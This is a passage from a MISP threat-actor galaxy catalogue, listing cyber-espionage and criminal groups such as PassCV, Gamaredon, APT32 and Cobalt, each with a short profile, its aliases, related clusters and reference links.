The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We’d like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they’ve begun development on.

The tag is: misp-galaxy:threat-actor="PassCV"

Table 11854. Table References

Links

https://threatvector.cylance.com/en_us/home/digitally-signed-malware-targeting-gaming-companies.html

Sath-ı Müdafaa

A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform that features points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor to hack the hackers. So the overarching motivation and allegiance of the group is not entirely clear.

The tag is: misp-galaxy:threat-actor="Sath-ı Müdafaa"

Aslan Neferler Tim

Turkish nationalist hacktivist group that has been active for roughly one year. According to Domaintools, the group’s site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey’s policies or leadership, and purports to act in defense of Islam

The tag is: misp-galaxy:threat-actor="Aslan Neferler Tim"

Aslan Neferler Tim is also known as:

  • Lion Soldiers Team

  • Phantom Turk

Ayyıldız Tim

Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.

The tag is: misp-galaxy:threat-actor="Ayyıldız Tim"

Ayyıldız Tim is also known as:

  • Crescent and Star

TurkHackTeam

Founded in 2004, Turkhackteam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteam’s forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.

The tag is: misp-galaxy:threat-actor="TurkHackTeam"

TurkHackTeam is also known as:

  • Turk Hack Team

Equation Group

The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Labs as one of the most sophisticated cyber attack groups in the world, operating alongside but always from a position of superiority with the creators of Stuxnet and Flame

The tag is: misp-galaxy:threat-actor="Equation Group"

Equation Group is also known as:

  • Tilded Team

  • EQGRP

  • G0020

Equation Group has relationships with:

  • similar: misp-galaxy:threat-actor="Longhorn" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="EquationDrug" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="DoubleFantasy" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="TripleFantasy" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="GrayFish" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="Fanny" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="EquationLaser" with estimative-language:likelihood-probability="very-likely"

Table 11855. Table References

Links

https://en.wikipedia.org/wiki/Equation_Group

https://www.cfr.org/interactive/cyber-operations/equation-group

https://arstechnica.com/information-technology/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/

https://www.dropbox.com/s/buxkfotx1kei0ce/Whitepaper%20Shadow%20Broker%20-%20Equation%20Group%20Hack.pdf?dl=0

https://en.wikipedia.org/wiki/Stuxnet

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

https://attack.mitre.org/groups/G0020/

Greenbug

Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.

The tag is: misp-galaxy:threat-actor="Greenbug"

Greenbug has relationships with:

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

Table 11856. Table References

Links

https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/

https://threatpost.com/shamoon-collaborator-greenbug-adopts-new-communication-tool/125383/

https://www.clearskysec.com/greenbug/

Gamaredon Group

Unit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013. In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their technical capabilities.

The tag is: misp-galaxy:threat-actor="Gamaredon Group"

Gamaredon Group is also known as:

  • ACTINIUM

  • DEV-0157

  • Blue Otso

  • BlueAlpha

  • G0047

  • IRON TILDEN

  • PRIMITIVE BEAR

  • Shuckworm

  • Trident Ursa

  • UAC-0010

  • Winterflounder

  • Aqua Blizzard

  • Actinium

Gamaredon Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Aqua Blizzard" with estimative-language:likelihood-probability="likely"

Table 11857. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution

https://www.lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_Final.pdf

https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution

https://attack.mitre.org/groups/G0047

https://github.com/StrangerealIntel/CyberThreatIntel/tree/master/Russia/APT/Gamaredon

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021

https://go.recordedfuture.com/hubfs/reports/cta-2019-1212.pdf

https://unit42.paloaltonetworks.com/atoms/tridentursa

https://cert.gov.ua/article/1229152

https://cert.gov.ua/article/971405

https://cert.gov.ua/article/40240

https://cert.gov.ua/article/39386

https://cert.gov.ua/article/39086

https://cert.gov.ua/article/39138

https://cert.gov.ua/article/18365

Infy

Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activities against human right activists in the beginning of 2015. In line5with other research on the campaign, released prior to publication of this document, we have adopted the name “Infy”, which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group’s malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.

The tag is: misp-galaxy:threat-actor="Infy"

Infy is also known as:

  • Operation Mermaid

  • Prince of Persia

  • Foudre

Table 11858. Table References

Links

https://www.intezer.com/prince-of-persia-the-sands-of-foudre/

https://www.freebuf.com/articles/network/105726.html

https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf

https://iranthreats.github.io/

http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/

https://www.cfr.org/interactive/cyber-operations/prince-persia

https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

https://unit42.paloaltonetworks.com/unit42-prince-persia-ride-lightning-infy-returns-foudre/

Sima

Sima is a group of suspected Iranian origin targeting Iranians in diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human RightsWatch’s (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghanr efugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director’s biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to professionally interact with the subject, then offered validation through links to their biography and social media, the former of which itself was malware as well. The bait documents contained a real article relevant to their interests and topic referenced, and the message attempted to address to how it aligned with their professional research or field of employment. The referenced documents sent were malware binaries posing as legitimate files using the common right-to-left filenames tactic in order to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to a tendency amongst other groups to simply continually send different forms of generic malware or phishing, in the hopes that one would eventually be successful.

The tag is: misp-galaxy:threat-actor="Sima"

Table 11859. Table References

Links

https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf

https://iranthreats.github.io/

Blue Termite

Blue Termite is a group of suspected Chinese origin active in Japan.

The tag is: misp-galaxy:threat-actor="Blue Termite"

Blue Termite is also known as:

  • Cloudy Omega

  • Emdivi

Table 11860. Table References

Links

https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/

https://www.cfr.org/interactive/cyber-operations/blue-termite

Groundbait

Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.

The tag is: misp-galaxy:threat-actor="Groundbait"

Table 11861. Table References

Links

http://www.welivesecurity.com/2016/05/18/groundbait

Longhorn

Longhorn has been active since at least 2011. It has used a range of back door Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to cfr, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural resource industries for espionage purposes. Some of the tools used by this threat actor were released by Wikileaks under the name "Vault 7."

The tag is: misp-galaxy:threat-actor="Longhorn"

Longhorn is also known as:

  • Lamberts

  • the Lamberts

  • APT-C-39

  • PLATINUM TERMINAL

Longhorn has relationships with:

  • similar: misp-galaxy:threat-actor="Equation Group" with estimative-language:likelihood-probability="likely"

Table 11862. Table References

Links

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/

https://www.cfr.org/interactive/cyber-operations/longhorn

http://blogs.360.cn/post/APT-C-39_CIA_EN.html

https://www.secureworks.com/research/threat-profiles/platinum-terminal

Callisto

The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.

The tag is: misp-galaxy:threat-actor="Callisto"

Callisto is also known as:

  • COLDRIVER

  • SEABORGIUM

  • TA446

  • GOSSAMER BEAR

  • BlueCharlie

  • Star Blizzard

Callisto has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Star Blizzard" with estimative-language:likelihood-probability="likely"

Table 11863. Table References

Links

https://web.archive.org/web/20170417102235/https://www.f-secure.com/documents/996508/1030745/callisto-group

https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe

https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations

https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.darkreading.com/attacks-breaches/russian-apt-bluecharlie-swaps-infrastructure-to-evade-detection

https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/

APT32

Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.

The tag is: misp-galaxy:threat-actor="APT32"

APT32 is also known as:

  • OceanLotus Group

  • Ocean Lotus

  • OceanLotus

  • Cobalt Kitty

  • APT-C-00

  • SeaLotus

  • Sea Lotus

  • APT-32

  • APT 32

  • Ocean Buffalo

  • POND LOACH

  • TIN WOODLAWN

  • BISMUTH

  • ATK17

  • G0050

  • Canvas Cyclone

APT32 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT32 - G0050" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Canvas Cyclone" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00" with estimative-language:likelihood-probability="likely"

Table 11864. Table References

Links

https://attack.mitre.org/groups/G0050/

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/

https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/

https://www.brighttalk.com/webcast/10703/261205

https://github.com/eset/malware-research/tree/master/oceanlotus

https://www.cfr.org/interactive/cyber-operations/ocean-lotus

https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them

https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam

SilverTerrier

As these tools rise and fall in popularity (and more importantly, as detection rates by antivirus vendors improve), SilverTerrier actors have consistently adopted new malware families and shifted to the latest packing tools available.

The tag is: misp-galaxy:threat-actor="SilverTerrier"

Table 11865. Table References

Links

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

WildNeutron

A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not-state sponsored, rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies who have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.

The tag is: misp-galaxy:threat-actor="WildNeutron"

WildNeutron is also known as:

  • Butterfly

  • Morpho

  • Sphinx Moth

Table 11866. Table References

Links

https://www.symantec.com/connect/blogs/butterfly-profiting-high-level-corporate-attacks

https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/

https://research.kudelskisecurity.com/2015/11/05/sphinx-moth-expanding-our-knowledge-of-the-wild-neutron-morpho-apt/

https://blog.twitter.com/official/en_us/a/2013/keeping-our-users-secure.html

https://www.facebook.com/notes/facebook-security/protecting-people-on-facebook/10151249208250766

https://www.reuters.com/article/us-apple-hackers/exclusive-apple-macs-hit-by-hackers-who-targeted-facebook-idUSBRE91I10920130219

https://blogs.technet.microsoft.com/msrc/2013/02/22/recent-cyberattacks/

PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.

The tag is: misp-galaxy:threat-actor="PLATINUM"

PLATINUM is also known as:

  • TwoForOne

  • G0068

  • ATK33

PLATINUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 11867. Table References

Links

http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/

https://attack.mitre.org/groups/G0068/

RASPITE

Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.

The tag is: misp-galaxy:threat-actor="RASPITE"

RASPITE is also known as:

  • LeafMiner

  • Raspite

Table 11868. Table References

Links

https://dragos.com/blog/20180802Raspite.html

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east

https://attack.mitre.org/groups/G0077/

FIN8

FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.

The tag is: misp-galaxy:threat-actor="FIN8"

FIN8 is also known as:

  • ATK113

  • G0061

FIN8 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="FIN8 - G0061" with estimative-language:likelihood-probability="likely"

Table 11869. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf

https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf

https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://attack.mitre.org/groups/G0061

El Machete

El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here. We’ve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.

The tag is: misp-galaxy:threat-actor="El Machete"

El Machete is also known as:

  • Machete

  • machete-apt

  • APT-C-43

  • G0095

El Machete has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Machete - APT-C-43" with estimative-language:likelihood-probability="likely"

Table 11870. Table References

Links

https://attack.mitre.org/groups/G0095/

https://securelist.com/el-machete/66108/

https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html

https://www.cfr.org/interactive/cyber-operations/machete

https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

Cobalt

A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.

The tag is: misp-galaxy:threat-actor="Cobalt"

Cobalt is also known as:

  • Cobalt Group

  • Cobalt Gang

  • GOLD KINGSWOOD

  • COBALT SPIDER

  • G0080

  • Mule Libra

Table 11871. Table References

Links

https://www.helpnetsecurity.com/2016/11/22/cobalt-hackers-synchronized-atm-heists/

https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-tests-banks-in-russia-and-romania/

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-september-cobalt-spider/

https://www.group-ib.com/blog/cobalt

https://www.reuters.com/article/us-taiwan-cyber-atms/taiwan-atm-heist-linked-to-european-hacking-spree-security-firm-idUSKBN14P0CX

https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

https://www.riskiq.com/blog/labs/cobalt-strike/

https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/

https://unit42.paloaltonetworks.com/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf

https://attack.mitre.org/groups/G0080/

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://unit42.paloaltonetworks.com/atoms/mulelibra/

TA459

The tag is: misp-galaxy:threat-actor="TA459"

TA459 is also known as:

  • G0062

TA459 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="TA459 - G0062" with estimative-language:likelihood-probability="likely"

Table 11872. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

https://attack.mitre.org/groups/G0062/

Cyber Berkut

The tag is: misp-galaxy:threat-actor="Cyber Berkut"

Table 11873. Table References

Links

https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/.V-wnrubaeEU.twitter

Tonto Team

Tonto Team is a Chinese-speaking APT group that has been active since at least 2013. They primarily target military, diplomatic, and infrastructure organizations in Asia and Eastern Europe. The group has been observed using various malware, including the Bisonal RAT and ShadowPad. They employ spear-phishing emails with malicious attachments as their preferred method of distribution.

The tag is: misp-galaxy:threat-actor="Tonto Team"

Tonto Team is also known as:

  • CactusPete

  • KARMA PANDA

  • BRONZE HUNTLEY

  • COPPER

  • Red Beifang

  • G0131

  • PLA Unit 65017

  • Earth Akhlut

  • TAG-74

Table 11874. Table References

Links

https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html

https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf

https://www.recordedfuture.com/multi-year-chinese-apt-campaign-targets-south-korean-academic-government-political-entities

Danti

The tag is: misp-galaxy:threat-actor="Danti"

Table 11875. Table References

Links

https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/

APT5

We have observed one APT group, which we call APT5, particularly focused on telecommunications and technology companies. More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors. Several times, APT5 has targeted organizations and personnel based in Southeast Asia. APT5 has been active since at least 2007. It appears to be a large threat group that consists of several subgroups, often with distinct tactics and infrastructure. APT5 has targeted or breached organizations across multiple industries, but its focus appears to be on telecommunications and technology companies, especially information about satellite communications. APT5 targeted the network of an electronics firm that sells products for both industrial and military applications. The group subsequently stole communications related to the firm’s business relationship with a national military, including inventories and memoranda about specific products they provided. In one case in late 2014, APT5 breached the network of an international telecommunications company. The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company’s relationships with other telecommunications companies

The tag is: misp-galaxy:threat-actor="APT5"

APT5 is also known as:

  • KEYHOLE PANDA

  • MANGANESE

  • BRONZE FLEETWOOD

  • TEMP.Bottle

  • Mulberry Typhoon

  • Poisoned Flight

APT5 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Mulberry Typhoon" with estimative-language:likelihood-probability="likely"

Table 11876. Table References

Links

https://www.fireeye.com/current-threats/apt-groups.html

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

https://www.mandiant.com/resources/insights/apt-groups

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

Tick

Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology, which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on political, media, and engineering sectors. STALKER PANDA has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.

The tag is: misp-galaxy:threat-actor="Tick"

Tick is also known as:

  • Nian

  • BRONZE BUTLER

  • REDBALDKNIGHT

  • STALKER PANDA

  • G0060

  • Stalker Taurus

  • PLA Unit 61419

Tick has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060" with estimative-language:likelihood-probability="likely"

Table 11877. Table References

Links

https://wikileaks.org/vault7/document/2015-08-20150814-256-CSIR-15005-Stalker-Panda/2015-08-20150814-256-CSIR-15005-Stalker-Panda.pdf

https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

https://www.secureworks.jp/resources/rp-bronze-butler

https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/

http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html

https://www.cfr.org/interactive/cyber-operations/bronze-butler

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

https://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

https://attack.mitre.org/groups/G0060/

https://www.secureworks.com/research/threat-profiles/bronze-butler

https://unit42.paloaltonetworks.com/atoms/stalkertaurus/

https://twitter.com/iiyonite/status/1384431491485155331

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

APT26

The tag is: misp-galaxy:threat-actor="APT26"

APT26 is also known as:

  • JerseyMikes

  • TURBINE PANDA

  • BRONZE EXPRESS

  • TECHNETIUM

APT26 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Turla - G0010" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Turla" with estimative-language:likelihood-probability="likely"

Table 11878. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-express

https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

SABRE PANDA

The tag is: misp-galaxy:threat-actor="SABRE PANDA"

Table 11879. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

BIG PANDA

The tag is: misp-galaxy:threat-actor="BIG PANDA"

Table 11880. Table References

Links

http://www.darkreading.com/attacks-and-breaches/crowdstrike-falcon-traces-attacks-back-to-hackers/d/d-id/1110402?

POISONUS PANDA

The tag is: misp-galaxy:threat-actor="POISONUS PANDA"

Table 11881. Table References

Links

